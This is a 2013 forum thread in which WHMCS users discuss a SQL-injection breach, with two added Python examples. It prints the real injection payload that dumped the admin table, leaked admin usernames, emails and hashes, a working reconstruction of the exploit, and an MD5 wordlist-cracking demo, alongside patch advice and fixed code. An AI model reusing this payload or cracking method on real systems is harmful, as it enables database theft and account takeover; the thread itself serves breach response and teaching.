WorldWideWebDev Posted October 10, 2013

Thought I would share some information on a hacking attempt (successful to an extent) which I had happen this morning, just in case anyone gets a new customer with this email or name turn up on their system. I hope that Kandyug@gmail.com isn't here? I'd like to get my hands on that one... I don't know if this is the best place to alert people of this guy, but here is a start from me. Have a read of this bit of interesting info... But if he is trolling here, we should do something about it. This happened at 6:35 am this morning to me. I got an SMS from my alert telling me an admin had logged in from a non-whitelisted IP. Read on.

Anthony Molina

Known information about a hacker who hacked into my system today.
Going by the name of: Nguyen Long
Logged IP address: 113.166.57.219
City: Thua Thien Hue, Country: Vietnam
Email: kandyug@gmail.com
HE USES THIS TO GET THE LOGIN EXPLOIT SO I AM PRETTY SURE HE USES IT A LOT...

Anyway, before he left he also changed his original details:

First Name: 'Nguyen' to 'AES_ENCRYPT(1,1), firstname= (SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)'
Last Name: 'Long' to '1'
Company Name: '' to '1'
Address 1: '10 am mat' to '1'
Address 2: 'Hue' to '1'
City: 'Thua Thien Hue' to '1'
State: 'Đồng Nai' to '1'
Postcode: '47000' to '1'
Country: 'VN' to 'US'
Phone Number: '841627118435' to '1'
Default Payment Method: '' to ''
NEWSLETTER: 'on' to ''
SMS NOTIFICATIONS: 'on' to ''
MOBILE PHONE NUMBER: '841627118435' to ''

The number happens to be Yellow Pages Sensis Australia. What can I do?? Spam him? Who do I actually report this to? Cheers
WorldWideWebDev (Author) Posted October 10, 2013

Hey Moderators, could you please give me access to my settings so that I may adjust some things? Like messages, settings, avatars and the like? Thanks...
Infopro Posted October 10, 2013

New users are limited as to what they can do. Once you become more active on the forums, more options and features are opened up to you.
WorldWideWebDev (Author) Posted October 10, 2013

And they call Victoria a nanny state, ha...
Infopro Posted October 10, 2013

And with that post, you should be good to go. Try again. Nothing to do with a nanny; it has everything to do with spammers, though. My apologies for the inconvenience.
WorldWideWebDev (Author) Posted October 10, 2013

Cheers guys...
webberoo Posted October 11, 2013

Did you get anywhere with this? I have recently had a similar thing happen on my site. Any advice? Thanks, Toby
bear Posted October 11, 2013

"Any advice?"

Yes, make sure you've patched or updated. See this: http://blog.whmcs.com/
WorldWideWebDev (Author) Posted October 11, 2013

Gone into lockdown mode. Scared shitless. I've made sure all the updates and patches were applied to the site, changed all my passwords (far out, that's hard; it's not just WHMCS, it's the hosts, domain suppliers, all the APIs, add-on connections etc.), signed up for two-factor authentication (time-based option), used Google Captcha (at least it also captures the IP address), disabled tickets for non-registered users, disabled all free offers so that users cannot register for a free product, hence having access to the ticketing system. Drank a bottle of scotch; not sure what's next, maybe do the last thing again? Grrr, it's all too hard.
bear Posted October 11, 2013

"hence having access to ticketing system"

That's the first mention I've seen of the tickets being an issue. As far as I know this has to do with submitting a details change request for a registered user with a specially crafted submission. What made you mention tickets (aside from the bottle)?
WorldWideWebDev (Author) Posted October 12, 2013

I'm not a programmer, but I've had many tickets in the past submitted with code on them. I looked into it and found some startling information. Is it correct? I don't know. What I do know is that my system responded with all of my passwords to the person in an automated email. The ticket system was off for non-registered users after the first attempts. But I forgot something: I had free offers available. Hence a person could become a registered user and then hack the system. This was actually good in a way, because we had info on the registration, and the hack afterwards. As I said, I'm not sure how they did it; I know what they did, and after the patches I hope it's secure.

This is info I found previously, months ago: /http://www.devilscafe.in/2012/05/whmcs-hacking-with-sumbit-ticket.html

As mentioned, I don't know what they did to get this, but here was my server's reply to them:

Dear 1:admin:info@worldwidetech.com.au:2767b7e235i488r74cd744df1877cd26fd, 2:mrxtheman:info@worldwidetech.com.au:99b5e27c7093aadd1234rffp71hyt40285, 3:Sandi:sandra@worldwidetechn.com.au:210dc1fd8cb433ede44rr15yb28fac275, 4:George:webmaster@worldwide.com.au:ffc53ce0106e98b43ewrff4sdf5cf8ed065, 5:WHMCS:support@whmcs.com:e72c07a946955ea521rwewrett545513579387 1 (1),

As you requested, your password for our client area has now been reset. Your new login details are as follows:

/http://www.worldwidewebs.com.au/billing
Email: kandyug @ gmail.com
Password: exaiZlI0s0

To change your password to something more memorable, after logging in go to My Details > Change Password.

World Wide Web Developers @ World Wide Web Developers

So from this I assume he had the golden key to everything and got in. I would not have even known, had it not been for an add-on which I now praise...

Anthony
bear Posted October 12, 2013

"I'm not a programmer, but I've had many tickets in the past submitted with code on them."

The link you provided was from May 2012, and that "php(eval)" ticket exploit was fixed long ago.

"As mentioned, I don't know what they did to get this, but here was my server's reply to them. [...] As you requested, your password for our client area has now been reset. Your new login details are as follows:"

From that it looks like the more recent issue is the cause (but a slightly different attack vector than I'd been reading about), since that's been used to grab details from the database of affected users. The patch, and patched recent versions, have reportedly corrected this. There are also mod_security rules that are effective in helping reduce the risk.

"So from this I assume he had the golden key to everything and got in. I would not have even known, had it not been for an add-on which I now praise..."

Looks from that like they did indeed gain access, at least to the point of grabbing that info. What add-on was it that's helped you spot that?
WorldWideWebDev (Author) Posted October 12, 2013 (edited)

WHMCS-NOW's SMS add-on alerted me to an ADMIN login from a non-whitelisted IP. I was onto it shortly after, thinking "How could that be?" We logged in before he obviously managed to do worse. The SMS add-in clearly saved us in this situation. (Plug, but it really did.)

I want to disable tickets because I got these tickets in the past with the code mentioned above. Not that they got in at that stage, and it was long ago. This time I assume the only way he got a reply from my system is because he created a ticket, isn't it? Or is the system so flawed that now they don't even have to create a ticket to get a response? Don't even mention that they get a response when they join, because if they can somehow put malicious code into the process of becoming a customer we are F*&^&$%$D... This system is getting worse by the minute? How can anyone run reliably?

Edited October 12, 2013 by WorldWideWebDev
bear Posted October 12, 2013

The most recent security issue allowed someone to submit information that would interact with the database in unexpected ways, allowing them to do various things they shouldn't have access to. The first one I heard of was a user details change, not tickets. Your example above appears to be the password reset function, but with the same exploit (assuming here), provided your system was not patched or up to date when that happened. If you were not on the latest patched version(s) when this took place, that's probably why it succeeded. WHMCS has stated the latest versions of the two supported branches are patched against this.
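The following is an added example, not code from this thread or from WHMCS itself. It reconstructs in Python, against an in-memory SQLite database, the pattern that the first-name payload in the opening post implies: the value begins with AES_ENCRYPT(1,1) and is followed by a second assignment, which only does anything if a database wrapper splices values starting with AES_ENCRYPT into the UPDATE unquoted. The wrapper below does exactly that (a hypothetical reconstruction, not WHMCS's real function), so the attacker's "first name" becomes an extra SET clause that copies every row of tbladmins into his own client record, which is then shown in the admin area and mailed out by the password-reset template. The table layouts, the sample admin rows (MD5 of "password" and "123456") and the SQLite rewrite of MySQL's GROUP_CONCAT(... SEPARATOR ...) syntax are assumptions. The fixed wrapper shows the correction a practitioner would expect: column names from an application-side allowlist, every value bound as a parameter, and the AES_ENCRYPT expression written by the application with the value and key bound too.

```python
import sqlite3


def setup_db():
    """Constructed sample schema standing in for WHMCS's tblclients/tbladmins."""
    conn = sqlite3.connect(":memory:")
    # Stand-in so the injected 'AES_ENCRYPT(1,1)' prefix parses in SQLite; it is not encryption.
    conn.create_function("AES_ENCRYPT", 2, lambda value, key: f"enc({value})")
    conn.executescript("""
        CREATE TABLE tbladmins(id INTEGER PRIMARY KEY, username TEXT, email TEXT, password TEXT);
        CREATE TABLE tblclients(id INTEGER PRIMARY KEY, firstname TEXT, lastname TEXT, cardnum TEXT);
        INSERT INTO tbladmins VALUES (1, 'admin', 'admin@example.com', '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO tbladmins VALUES (2, 'sandi', 'sandi@example.com', 'e10adc3949ba59abbe56e057f20f883e');
        INSERT INTO tblclients(id, firstname, lastname) VALUES (7, 'Nguyen', 'Long');
    """)
    return conn


def update_query_vulnerable(conn, table, values, where):
    """Hypothetical reconstruction of the bug the payload implies: ordinary values are quoted,
    but anything starting with 'AES_ENCRYPT' is passed through as raw SQL so that callers can
    write encryption expressions. User input reaches it unchecked, so the check is attacker-controlled."""
    assignments = []
    for field, value in values.items():
        value = str(value)
        if value.startswith("AES_ENCRYPT"):
            assignments.append(f"{field}={value}")        # raw SQL straight from the form
        else:
            escaped = value.replace("'", "''")
            assignments.append(f"{field}='{escaped}'")
    sql = f"UPDATE {table} SET {', '.join(assignments)} WHERE {where}"
    conn.execute(sql)
    return sql


CLIENT_FIELDS = {"firstname", "lastname", "cardnum"}   # columns the application may update


def update_query_safe(conn, table, values, row_id, encrypt_fields=(), key=None):
    """Fixed form: column names are checked against an allowlist, every user value is bound as a
    parameter, and fields that must be stored encrypted get AES_ENCRYPT(?, ?) written by the
    application, with the value and key passed as parameters rather than spliced into the SQL."""
    assignments, params = [], []
    for field, value in values.items():
        if field not in CLIENT_FIELDS:
            raise ValueError(f"unexpected column {field!r}")
        if field in encrypt_fields:
            assignments.append(f"{field}=AES_ENCRYPT(?, ?)")
            params.extend([value, key])
        else:
            assignments.append(f"{field}=?")
            params.append(value)
    params.append(row_id)
    sql = f"UPDATE {table} SET {', '.join(assignments)} WHERE id=?"
    conn.execute(sql, params)
    return sql


# The thread's first-name value, with MySQL's GROUP_CONCAT(..., SEPARATOR ...) rewritten for
# SQLite (assumption: same effect, different dialect). Both engines keep the rightmost
# assignment when a column is set twice, so the second 'firstname=' wins.
PAYLOAD = ("AES_ENCRYPT(1,1), firstname=(SELECT GROUP_CONCAT("
           "id||':'||username||':'||email||':'||password, ', ') FROM tbladmins)")


def firstname_of(conn, row_id):
    return conn.execute("SELECT firstname FROM tblclients WHERE id=?", (row_id,)).fetchone()[0]


def demo_vulnerable():
    conn = setup_db()
    update_query_vulnerable(conn, "tblclients", {"firstname": PAYLOAD, "lastname": "1"}, "id=7")
    return firstname_of(conn, 7)    # the admin table, now sitting in the client's first name


def demo_safe():
    conn = setup_db()
    update_query_safe(conn, "tblclients", {"firstname": PAYLOAD, "lastname": "1"}, 7)
    return firstname_of(conn, 7)    # the payload stored as an inert string


if __name__ == "__main__":
    print("vulnerable:", demo_vulnerable())
    print("safe:      ", demo_safe())
```

Running it prints the id:username:email:hash list in the vulnerable case, which is the same shape as the data that arrived in the password-reset email above; the safe variant stores the payload text verbatim and nothing else changes.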
PhatPT Posted October 12, 2013

You can contact VNCERT: http://vncert.gov.vn/
Walter Blanco Posted October 12, 2013

Can you confirm if you had applied the latest patch? I mean the patch for this security problem: http://forum.whmcs.com/showthread.php?79527-October-3rd-2013-Security-Patch-Follow-Up&p=339519#post339519
WorldWideWebDev (Author) Posted October 13, 2013

Thanks for the link PhatPT, but I was lost when I opened it.

Updated: Can anyone tell me where I can disable registrations unless they purchase a product from me?
brian! Posted October 13, 2013

Setup -> General Settings -> Other -> untick "Allow Client Registration"
WorldWideWebDev (Author) Posted October 14, 2013

Thanks.....
Walter Blanco Posted October 14, 2013

"Thanks....."

Did you read my message #16? It went into moderation and appeared 24h after I wrote it; that link has information about your problem.
WorldWideWebDev (Author) Posted October 14, 2013

Walter, it was exactly as mentioned in the post you referred to, #16. I didn't have the patch installed, so it got me. From research I have made, he gets the hash codes delivered by email and then easily visits one of many online hash decoders (example: http://www.md5decrypter.co.uk), puts in the whole bundle and it spits out passwords. Two of my passwords came out on that site. Give it a go; my password hashes still work. It seems too easy.
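An added example, not part of the post above, showing in Python why the "decoder" step is so easy once the tuples are out: it parses a constructed id:username:email:hash list of the same shape as the leaked one (the hashes in the thread are obfuscated, so the rows here are MD5 of "password", "123456" and of a long passphrase), looks the hashes up in a table precomputed from a small wordlist, and then goes one step beyond the post to contrast that with a salted, iterated hash from the standard library (PBKDF2-HMAC-SHA256), where no precomputed table applies and every guess has to be recomputed per user. The wordlist and iteration count are assumptions for the demonstration; salting does not rescue a password that is itself in the wordlist, which the code also shows.

```python
import hashlib
import hmac
import os
import re

# Constructed sample of leaked tuples in the id:username:email:md5 shape seen in the thread.
LEAKED = ("1:admin:admin@example.com:5f4dcc3b5aa765d61d8327deb882cf99, "
          "2:sandi:sandi@example.com:e10adc3949ba59abbe56e057f20f883e, "
          "3:george:george@example.com:"
          + hashlib.md5(b"correct horse battery staple 7x!Q").hexdigest())

# Constructed wordlist; real cracking lists run to hundreds of millions of entries.
WORDLIST = ["letmein", "password", "123456", "qwerty", "admin"]

ITERATIONS = 100_000    # assumed PBKDF2 work factor for the demonstration

TUPLE_RE = re.compile(r"(\d+):([^:,\s]+):([^:,\s]+):([0-9a-f]{32})")


def parse_leak(text):
    """Split the GROUP_CONCAT output back into (id, username, email, md5hex) records."""
    return [(int(i), u, e, h) for i, u, e, h in TUPLE_RE.findall(text)]


def crack_md5(records, wordlist):
    """What an online 'MD5 decrypter' does: hash every candidate once, then look each leaked
    hash up. Unsalted MD5 means one table serves every user on every site, forever."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {username: table.get(h) for _, username, _, h in records}


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Salted, slow hash: a random per-user salt makes precomputed tables useless and the
    iteration count makes each online guess cost the attacker real CPU time."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt.hex() + "$" + digest.hex()


def verify_password(password, stored, iterations=ITERATIONS):
    salt_hex, digest_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), iterations)
    return hmac.compare_digest(candidate.hex(), digest_hex)


def crack_salted(stored_by_user, wordlist):
    """Against salted hashes there is no shared table: every candidate is recomputed for every
    user. Weak passwords still fall, but each one costs wordlist_size * iterations hashes."""
    return {user: next((w for w in wordlist if verify_password(w, stored)), None)
            for user, stored in stored_by_user.items()}


if __name__ == "__main__":
    records = parse_leak(LEAKED)
    print("unsalted MD5 :", crack_md5(records, WORDLIST))
    salted = {"admin": hash_password("password"), "george": hash_password("correct horse battery staple 7x!Q")}
    print("salted PBKDF2:", crack_salted(salted, WORDLIST))
```

The first line of output recovers the two weak admin passwords instantly from a five-word table, which is all the "decrypter" sites are doing at scale; the second shows the salted scheme still giving up "password" but only after per-user work, and never giving up the passphrase.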
epretorious Posted October 15, 2013

"From research I have made, he gets the hash codes delivered by email..."

Will the e-mail appear in the Client Profile list of e-mails (https://www.example.com/whmcs/admin/clientsemails.php?userid=XX)? Or would that just be too easy?
WorldWideWebDev (Author) Posted October 15, 2013

Hi Epretorious, to answer the question: no, it isn't that easy; it does not show up in his list of emails. It's easier: it shows all this information in the first name section of the active client. So in the drop-down field you see the whole string of information. Then it's in the logs also. It was explained completely here: http://blog.sucuri.net/2013/10/whmcs-sql-injection-vulnerability-in-the-wild.html
Walter Blanco Posted October 15, 2013

WHMCS uses MD5 for password hashes? (No, I still don't have a WHMCS license; I'm checking these forums to view pros and cons before buying.)
epretorious Posted October 15, 2013 (edited)

This would be laughable if it hadn't happened two days after patching WHMCS to 5.2.8. I received this e-mail this morning:

Rocket-Powered.com
hello admin i just could get data from your database using a WHMCS SQL inejection via python script , DATA from admin table:
admin:administrative@rocket-powered.com:79df6ade1bccf3e3fbdd123a9e11c29d
Please contact me )

The tuple contains the MD5 hash of the new password that I'd set twenty-four hours after I'd patched WHMCS! WTF?

Edited October 15, 2013 by epretorious